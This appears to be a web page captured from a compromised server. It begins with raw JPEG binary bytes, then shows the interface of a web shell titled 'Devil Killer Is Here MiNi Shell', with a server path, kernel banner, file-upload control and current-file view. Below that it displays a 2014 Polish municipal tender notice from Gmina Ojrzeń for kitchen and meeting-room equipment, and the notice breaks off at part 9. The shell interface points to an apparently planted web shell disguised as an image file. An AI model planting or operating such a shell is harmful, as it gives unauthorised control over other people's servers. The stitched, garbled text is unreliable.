JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140828/184561-N-2014.html

<p class="kh_header"><b>Ojrzeń: Zakup wyposażenia do: świetlic wiejskich w: Ojrzeniu, Kraszewie, Młocku, Nowej Wsi, Żochach; siłowni wiejskich w Ojrzeniu i Kraszewie</b><br>
<b>Numer ogłoszenia: 184561 - 2014; data zamieszczenia: 28.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ojrzeń , Ciechanowska 27, 06-456 Ojrzeń, woj. mazowieckie, tel. 0-23 671-83-20, faks 0-23 671-83-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ojrzen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia do: świetlic wiejskich w: Ojrzeniu, Kraszewie, Młocku, Nowej Wsi, Żochach; siłowni wiejskich w Ojrzeniu i Kraszewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy podzielane na 12 niezależnych (oddzielnych) części:
1.	Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia kuchni. 
2.	Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia sali spotkań. 
3.	Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia kuchni. 
4.	Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia sali spotkań. 
5.	Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia kuchni.
6.	Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia sali spotkań. 
7.	Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia kuchni. 
8.	Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia sali spotkań.
9. Zakup wyposażenia do świetlicy wiejskiej w Żochach - zakup wyposażenia sali spotkań.
10.	Zakup wyposażenia do świetlicy wiejskiej w Żochach - zakup zastawy stołowej.
11.	Zakup wyposażenia do siłowni wiejskiej w Ojrzeniu, 
12.	Zakup wyposażenia do siłowni wiejskiej w Kraszewie.  
Przedmiot zamówienia obejmuje m.in. dostarczenie, załadunek, rozładunek, wraz z wszelkimi kosztami, jakie poniesie Wykonawca.
Wszystkie dostarczane rzeczy (przedmiot zamówienia) muszą być fabrycznie nowe, wolne od wad oraz dopuszczone do stosowania. Wszystkie dostarczone pomoce muszą posiadać odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem.
Szczegółowy opis elementów przedmiotów zamówienia stanowią załączniki: 
Załącznik Nr 1 do SIWZ	Szczegółowy opis części zamówienia.
Załącznik Nr 2 do SIWZ	Formularze cenowe dla wszystkich części zamówienia.
Wszelkie, użyte w opisie przedmiotu zamówienia wskazania znaków towarowych, patentów lub pochodzenia materiałów należy traktować jako materiał informacyjny. We wszystkich przypadkach dopuszczalne jest zastosowanie materiałów równoważnych. Wszystkie nazwy własne urządzeń i materiałów użyte w dokumentacji przetargowej są podane przykładowo i określają jedynie minimalne, oczekiwane parametry jakościowe oraz wymagany standard.

Wykonawca na dostarczone rzeczy, stanowiące przedmiot zamówienia udzieli min. 12- miesięcznej gwarancji i rękojmi od dnia wykonania dostawy - zlecenia jednostkowego. Za dokument gwarancyjny zostanie uznana podpisana przez obie strony umowa stanowiąca załącznik SIWZ. W przypadku dłuższej gwarancji udzielanej przez producenta rzeczy, stanowiącej przedmiot dostawy, obowiązuje gwarancja producenta.
Wykonawca zobowiązuje się na własny koszt i ryzyko wykonać przedmiot niniejszego zamówienia.
Wykonawca zobowiązany jest wykonać przedmiot umowy zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami i polskimi normami bezpieczeństwa dotyczącymi przedmiotów używanych w oddziałach przedszkolnych.
Materiały użyte do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania na terenie RP oraz spełniać warunki określone w odrębnych przepisach.
Wykonanie przedmiotu zamówienia musi odbywać się zgodnie z przepisami BHP i przepisami prawa.
Zamawiający dopuszcza składanie ofert wariantowych - równoważnych pod warunkiem, że zaproponowane przedmioty będą posiadały parametry nie gorsze niż te, które przedstawiono w szczegółowym opisie przedmiotu zamówienia, dołączonym do siwz. Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego sprzęty spełniają wymagania określone przez Zamawiającego. W takim przypadku Wykonawca musi załączyć dane techniczne wykazujące ich parametry oraz odpowiednie obliczenia. Na Wykonawcy leży obowiązek udowodnienia, iż przedstawione w ofercie sprzęty są równoważne w stosunku do przedstawionych w szczegółowym opisie przedmiotu zamówienia, dołączonym do siwz. Zamawiający dopuszcza złożenie ofert o +/- 10 % od podanych w załączniku nr 1 wymiarów i parametrów (lub innych wartości, o ile są wskazane w szczegółowym opisie przedmiotu zamówienia). Oceny równoważności ofert Zamawiający będzie dokonywał na etapie oceny ofert w oparciu o opinie pracowników merytorycznych i opisy dostarczone przez Wykonawcę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.71.13.60-0, 39.71.13.62-4, 42.95.90.00-3, 39.14.10.00-2, 39.22.12.00-9, 39.22.30.00-1, 39.11.21.00-1, 39.13.60.00-4, 39.71.11.10-3, 39.71.11.30-9, 39.22.11.50-3, 39.14.32.10-1, 39.14.31.10-0, 37.44.23.00-8, 37.44.25.00-8, 37.44.22.00-8, 37.44.24.00-8, 37.44.29.00-8, 37.44.21.00-8, 37.44.13.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający korzystając z zapisów art. 45 ust. 2 ustawy Prawo zamówień publicznych, nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
Ocena spełnienia warunków dokonana zostanie w oparciu o oświadczenia i dokumenty które ma dostarczyć Wykonawca.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
Ocena spełnienia warunków dokonana zostanie w oparciu o oświadczenia i dokumenty które ma dostarczyć Wykonawca.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
Ocena spełnienia warunków dokonana zostanie w oparciu o oświadczenia i dokumenty które ma dostarczyć Wykonawca.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
Ocena spełnienia warunków dokonana zostanie w oparciu o oświadczenia i dokumenty które ma dostarczyć Wykonawca.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
Ocena spełnienia warunków dokonana zostanie w oparciu o oświadczenia i dokumenty które ma dostarczyć Wykonawca.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularze cenowe stanowiące załącznik nr 2 do SIWZ, za pomocą których zostanie obliczona cena zamówienia, składane odpowiednio dla każdej z części zamówienia, której dotyczy składana oferta.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t. j. Dz. U. z 2013 poz. 907 ze zm.) w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków:
1) zmiana terminu wykonania zamówienia ulegnie przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a) przestojów i opóźnień zawinionych przez Zamawiającego;
b) działania siły wyższej (np. klęski żywiołowej, strajków generalnych lub lokalnych) mającej bezpośredni wpływ na terminowość wykonania dostawy;
c) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
2) Zmiany podwykonawców wskazanych w § 4 umowy zgodnie z ofertą Wykonawcy,
3) zmiana terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować, pod warunkiem że Zamawiający nie straci dofinansowania.
4) Zmiana wysokości stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ojrzen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ojrzeń, ul. Ciechanowska 27, 06-456 Ojrzeń,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 11:00, miejsce: Gmina Ojrzeń ul. Ciechanowska 27, 06-456 Ojrzeń, pokój nr 20 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków Unii Europejskiej z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich działanie Wdrażanie Lokalnych Strategii Rozwoju.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia kuchni, obejmujący: 
a.	Piekarnik (piec konwekcyjny)	szt.	1;
b.	Patelnia gastronomiczna	szt.	1;
c.	Okap kuchenny	szt.	1;
d.	Warnik do wody	szt.	1;
e.	Zaparzacz	szt.	1;
f.	Kuchenka mikrofalowa	szt.	1;
g.	Zmywarka z podstawą	szt.	1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.71.13.60-0, 39.71.13.62-4, 42.95.90.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia sali spotkań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Ojrzeniu - zakup wyposażenia sali spotkań, obejmujący: 
a.	Krzesła na salę spotkań	szt.	100;
b.	Wieszaki do szatni	szt.	8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.21.00-1, 39.13.60.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia kuchni, obejmujący: 
a.	Chłodziarko zamrażarka	szt.	1;
b.	Piekarnik (piec konwekcyjny)	szt.	1;
c.	Warnik do wody	szt.	1;
d.	Zaparzacz	szt.	1;
e.	Kuchenka mikrofalowa	szt.	1;
f.	Zmywarka z podstawą	szt.	1;
g.	Wózek do serwowania/transportowy	szt.	1;
h.	Regały do przechowywania żywności	szt.	4;
i.	Odkurzacz przemysłowy	szt.	1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.71.11.10-3, 39.71.13.60-0, 39.14.10.00-2, 39.71.13.62-4, 42.95.90.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia sali spotkań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Kraszewie - zakup wyposażenia sali spotkań, obejmujący:
a.	Krzesła na salę spotkań	szt.	40;
b.	Wieszaki do szatni	szt.	8;
c.	Stoły na salę spotkań	szt.	5;
d.	Narożnik (sofa)wypoczynkowa	szt.	1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.21.00-1, 39.13.60.00-4, 39.14.32.10-1, 39.14.31.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia kuchni, obejmujący:
a.	Szafa chłodnicza	Szt.	1;
b.	Szafa chłodnicza przeszklona	Szt.	1;
c.	Patelnia gastronomiczna	szt.	1;
d.	Piekarnik (piec konwekcyjny)	Szt.	1;
e.	Warnik do wody	Szt.	1;
f.	Zaparzacz	Szt.	1;
g.	Termosy do zupy	Szt.	2;
h.	Kuchenka mikrofalowa	Szt.	1;
i.	Okap kuchenny	Szt.	1;
j.	Garnek ok. 50 l	Szt.	1;
k.	Garnki ok.30 l	Szt.	2;
l.	Zmywarka z podstawą	Szt.	1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.71.11.30-9, 39.71.13.60-0, 39.71.13.62-4, 42.95.90.00-3, 39.22.11.50-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia sali spotkań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Młocku - zakup wyposażenia sali spotkań, obejmujący:
a.	Stoły na salę spotkań	Szt.	6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.32.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia kuchni, obejmujący:
a.	Szafa chłodnicza	szt.	1;
b.	Szafa chłodnicza przeszklona	szt.	1;
c.	Piekarnik (piec konwekcyjny)	szt.	1;
d.	Taboret kuchenny	szt.	1;
e.	Stoły kuchenne z szafkami	szt.	2;
f.	Szafki kuchenne	szt.	2;
g.	Basen dwukomorowy	szt.	1;
h.	Garnek ok. 50 l	szt.	1;
i.	Garnki ok.30 l	szt.	2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.71.11.30-9, 39.71.13.60-0, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia sali spotkań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Nowej Wsi - zakup wyposażenia sali spotkań, obejmujący:
a.	Stoły na salę spotkań	szt.	1;
b.	Krzesła na salę spotkań	szt.	16..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.32.10-1, 39.11.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Żochach - zakup wyposażenia sali spotkań.</p>
